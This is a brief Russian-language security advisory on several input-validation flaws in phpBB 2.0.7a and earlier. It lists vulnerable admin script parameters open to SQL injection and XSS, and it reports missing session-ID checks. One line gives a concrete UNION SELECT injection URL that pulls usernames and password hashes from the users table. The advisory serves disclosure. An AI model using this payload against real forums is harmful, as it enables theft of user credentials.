Программа: phpBB 2.0.7а и более ранние версии
Несколько уязвимостей в проверке правильности входных данных обнаружено в phpBB. Удаленный авторизованный администратор может внедрить SQL команды. Удаленный пользователь может выполнить XSS нападение.
1. SQL инъекция:
admin_smilies.php?mode=edit&id=99 UNION SELECT 0,username,0,user_password FROM othersite_phpbb_users WHERE
user_id=2
и еще:
admin_smilies.php?mode=edit&id=[SQL]
admin_ smilies.php?mode=delete&id=[SQL]
admin_smilies.php?mode=edit&id=[XSS]
admin_smilies.php?mode=delete&id=[XSS]
admin_styles.php?mode=edit&style_id=[SQL]
admin_styles.ph p?mode=delete&style_id=[SQL]
admin_styles.php?mode=edit&style_id=[XSS]
admin_styles.php?mode=delete&style_id=[XSS]
Также сообщается, что множество сценариев не проверяют ID сессии. В результате удаленный пользователь может внедрить phpBB команды в тело сообщения
и они будут выполнены в браузере целевого пользователя, просматривающего сообщение форума.
